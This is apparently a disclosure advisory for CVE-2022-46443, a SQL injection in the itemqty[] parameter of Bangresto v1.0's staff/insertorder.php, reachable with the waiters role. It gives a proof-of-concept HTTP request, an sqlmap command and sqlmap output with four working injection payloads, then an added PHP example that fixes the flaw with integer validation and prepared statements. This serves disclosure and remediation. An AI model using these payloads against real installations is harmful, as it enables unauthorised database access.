Bangresto

Researcher

This vulnerability was discovered by @yuyudhn.

Description

When authenticated with the 'waiters' role, the itemqty[] parameter (sent URL-encoded as itemqty%5B%5D) of staff/insertorder.php in Bangresto v1.0 appears to be vulnerable to SQL injection.

Details

Details about the software affected by CVE-2022-46443.

Software:            Bang Resto
Software Link:       https://github.com/mesinkasir/bangresto
Vendor:              mesinkasir
Vulnerable Version:  v1.0
Classification:      SQL Injection
Required privilege:  Low (waiters role)
Publicly disclosed:  2022-12-14

Proof of Concept

Burp request (saved as test.txt for sqlmap):

POST /labs/bangresto/staff/insertorder.php HTTP/1.1
Host: localhost
Content-Length: 57
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="107", "Not=A?Brand";v="24"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/labs/bangresto/staff/order.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: [waiters cookie]
Connection: close

itemID%5B%5D=1&itemqty%5B%5D=2&sentorder=Sent+to+kitchen

sqlmap command

sqlmap -r test.txt -p itemqty%5B%5D

Output

POST parameter 'itemqty[]' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 260 HTTP(s) requests:
---
Parameter: itemqty[] (POST)
    Type: boolean-based blind
    Title: Boolean-based blind - Parameter replace (original value)
    Payload: itemID[]=1&itemqty[]=(SELECT (CASE WHEN (9140=9140) THEN 2 ELSE (SELECT 7134 UNION SELECT 3807) END))&sentorder=Sent to kitchen

    Type: inline query
    Title: Generic inline queries
    Payload: itemID[]=1&itemqty[]=(SELECT CONCAT(CONCAT(0x716a7a6b71,(CASE WHEN (1964=1964) THEN 0x31 ELSE 0x30 END)),0x7178717a71))&sentorder=Sent to kitchen

    Type: error-based
    Title: MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)
    Payload: itemID[]=1&itemqty[]=2 AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x716a7a6b71,(SELECT (ELT(9892=9892,1))),0x7178717a71,0x78))s), 8446744073709551610, 8446744073709551610)))&sentorder=Sent to kitchen

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: itemID[]=1&itemqty[]=2 AND (SELECT 1424 FROM (SELECT(SLEEP(5)))jWeg)&sentorder=Sent to kitchen
---
[10:19:14] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.4.53, PHP 7.4.29
back-end DBMS: MySQL >= 5.5 (MariaDB fork)
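The fix a maintainer would apply to the handler behind insertorder.php, as an added example that is not Bangresto's own code: every element of the itemID[] and itemqty[] arrays is validated as a positive integer and then bound through a prepared statement instead of being concatenated into the INSERT, so none of the payloads above ever becomes part of the SQL text. The table and column names are assumptions made for illustration.

```php
<?php
// Added example (not Bangresto's code): safe handling of the itemID[] / itemqty[]
// arrays posted to insertorder.php. Table and column names are assumed.

function validate_order_items(array $ids, array $qtys): array {
    // The two arrays must line up one-to-one; anything that is not a
    // positive integer (including a string such as "2 AND (SELECT ...)"
    // or a nested array) is rejected before it reaches the database.
    if (count($ids) !== count($qtys)) {
        throw new InvalidArgumentException('itemID[] and itemqty[] length mismatch');
    }
    $items = [];
    foreach ($ids as $i => $id) {
        $qty = $qtys[$i] ?? null;
        $id  = filter_var($id,  FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
        $qty = filter_var($qty, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
        if ($id === false || $qty === false) {
            throw new InvalidArgumentException('item id and quantity must be positive integers');
        }
        $items[] = ['id' => $id, 'qty' => $qty];
    }
    return $items;
}

function insert_order(mysqli $db, int $orderId, array $items): void {
    // One prepared statement, executed once per row. Values travel as
    // typed bound parameters, never as part of the query string.
    $stmt = $db->prepare(
        'INSERT INTO order_items (order_id, item_id, qty) VALUES (?, ?, ?)'
    );
    foreach ($items as $item) {
        $stmt->bind_param('iii', $orderId, $item['id'], $item['qty']);
        $stmt->execute();
    }
    $stmt->close();
}

// Usage from the request handler ($db and $orderId come from the application):
// $items = validate_order_items($_POST['itemID'] ?? [], $_POST['itemqty'] ?? []);
// insert_order($db, $orderId, $items);
```

Rejecting the request on the validation error, rather than silently dropping bad rows, also gives the application a clear point at which to log injection attempts against this endpoint.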
